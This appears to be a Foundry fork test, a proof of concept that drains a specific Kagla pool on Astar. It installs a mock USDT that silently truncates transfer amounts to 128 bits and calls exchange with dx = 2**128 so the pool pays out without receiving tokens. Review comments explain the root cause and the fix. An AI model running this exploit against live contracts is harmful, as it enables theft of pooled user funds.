// SPDX-License-Identifier: UNLICENSED | |
pragma solidity >0.8.20; | |
pragma experimental ABIEncoderV2; | |
import {Test} from "forge-std/Test.sol"; | |
import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol"; | |
import "forge-std/console.sol"; | |
/// @notice Minimal interface to the pool under test; it declares only the two
///         functions this file calls.
/// @dev The `exchange` signature matches the Vyper-style prototype quoted in
///      the test body. Descriptions below are inferred from the parameter names;
///      the pool's source is not part of this file, so confirm against it.
interface IIPool {
    /// @notice Presumably returns the token address stored at the given coin index.
    function coins(uint256) external view returns (address);

    /// @notice Presumably swaps `dx` of coin `i` for coin `j`, with `min_dy` as
    ///         the caller's lower bound on the output amount.
    function exchange(int128 i, int128 j, uint256 dx, uint256 min_dy) external returns (uint256);
}
/// @title USDT test double whose transfers truncate the amount to 128 bits
/// @notice ERC20 mock that the test installs over the USDT address on the fork.
/// @dev `transfer` and `transferFrom` narrow `amount` to `uint128` with an explicit
///      conversion. In Solidity 0.8 an explicit narrowing conversion discards the
///      high bits and does not revert, so any `amount` above `type(uint128).max`
///      moves only its low 128 bits while the call still returns `true`.
///      NOTE(review): this presumably models the behaviour of the real asset at
///      that address; confirm against the accompanying write-up.
///      Security relevance: an integrator that treats a successful call as proof
///      that `amount` tokens moved will mis-account. Measuring the recipient's
///      balance before and after the transfer, or rejecting amounts that do not
///      fit the token's native width, removes that assumption.
contract USDT is ERC20 {
    constructor() ERC20("Tether USD", "USDT") {}

    /// @notice Fixed at 6 decimals.
    function decimals() public pure override returns (uint8) {
        return 6;
    }

    /// @notice Moves only the low 128 bits of `amount` from `sender` to `recipient`.
    /// @dev Allowance is spent on the truncated value as well, because the
    ///      truncated value is what reaches the parent implementation.
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        // Explicit uint256 -> uint128 conversion: silent truncation, no revert.
        uint256 movedAmount = uint256(uint128(amount));
        return super.transferFrom(sender, recipient, movedAmount);
    }

    /// @notice Moves only the low 128 bits of `amount` from the caller to `recipient`.
    function transfer(address recipient, uint256 amount) public override returns (bool) {
        // Same silent truncation as in transferFrom.
        uint256 movedAmount = uint256(uint128(amount));
        return super.transfer(recipient, movedAmount);
    }

    /// @notice Mints `amount` to `recipient` with no access control.
    /// @dev Only acceptable because this contract is a test fixture.
    function mint(address recipient, uint256 amount) public {
        _mint(recipient, amount);
    }
}
/// @title Fork test for the pool's handling of a token that truncates transfer amounts
/// @notice Calls `exchange` with a `dx` whose low 128 bits are zero and logs the
///         pool's and the caller's balances before and after the call.
/// @dev Root cause under test: the mock token moves `uint128(dx)` tokens, which is
///      0 for `dx = 2**128`. The test is written to show what the pool pays out if
///      it prices the swap on the requested `dx` instead of the amount received.
///      The pool's source is not part of this file, so that reading is inferred.
///      A pool that credits the balance delta measured around `transferFrom`, or
///      that bounds `dx` to the token's amount width, is not exposed to this.
///      NOTE(review): the test only logs and never asserts, so it passes whether
///      or not the issue reproduces. To use it as a regression test, assert the
///      post-fix behaviour, e.g. that the call reverts.
contract DrainPool is Test {
    USDT usdt;
    IIPool kaglaPool = IIPool(0xDc1C5bAbB4dad3117Fd46d542f3b356D171417fA);

    /// @notice Forks the chain at a fixed block and installs the mock token.
    function setUp() public {
        // The API key in this URL is a placeholder. Supply the real endpoint
        // through configuration (for example an `[rpc_endpoints]` alias in
        // foundry.toml) rather than committing a key to source.
        vm.createSelectFork("https://astar-mainnet.g.alchemy.com/v2/xxxxxxxx", 4822542);

        // Replace the code at the token address with the truncating mock.
        address usdtAddress = address(0xfFFfffFF000000000000000000000001000007C0);
        deployCodeTo("DrainPool.t.sol:USDT", "", usdtAddress);
        usdt = USDT(usdtAddress);

        // The mock keeps its own balance storage, so the pool's holding is
        // seeded here. NOTE(review): the figure presumably matches the pool's
        // on-chain balance at the fork block; confirm.
        usdt.mint(address(kaglaPool), 267994933776);
    }

    /// @notice Logs balances, performs one `exchange(0, 1, 2**128, 0)`, then logs balances again.
    function testDrainKagla() public {
        ERC20 threeKgl = ERC20(kaglaPool.coins(1));
        address pool = address(kaglaPool);
        address self = address(this);

        console.log("Draining the Kagla USDT-3KGL pool");
        console.log("pool.coins(0): %s", kaglaPool.coins(0));
        console.log("pool.coins(1): %s", kaglaPool.coins(1));

        uint256 poolUsdtBefore = usdt.balanceOf(pool);
        console.log("usdt.balanceOf(address(pool)) : %s", poolUsdtBefore);
        uint256 poolKglBefore = threeKgl.balanceOf(pool);
        console.log("3kgl.balanceOf(address(pool)): %s", poolKglBefore);
        uint256 selfKglBefore = threeKgl.balanceOf(self);
        console.log("3kgl.balanceOf(address(this)): %s", selfKglBefore);

        console.log("Draining pool now...");

        // def exchange(i: int128, j: int128, dx: uint256, min_dy: uint256)
        // 2**128 is the smallest value whose uint128 truncation is 0, so the mock
        // token's transferFrom moves nothing. min_dy is 0, so there is no output floor.
        uint256 wrappedDx = uint256(type(uint128).max) + 1;
        kaglaPool.exchange(0, 1, wrappedDx, 0);

        uint256 poolUsdtAfter = usdt.balanceOf(pool);
        console.log("usdt.balanceOf(address(pool)) : %s", poolUsdtAfter);
        uint256 poolKglAfter = threeKgl.balanceOf(pool);
        console.log("kgl3.balanceOf(address(pool)): %s", poolKglAfter);
        uint256 selfKglAfter = threeKgl.balanceOf(self);
        console.log("3kgl.balanceOf(address(this)): %s", selfKglAfter);
    }
}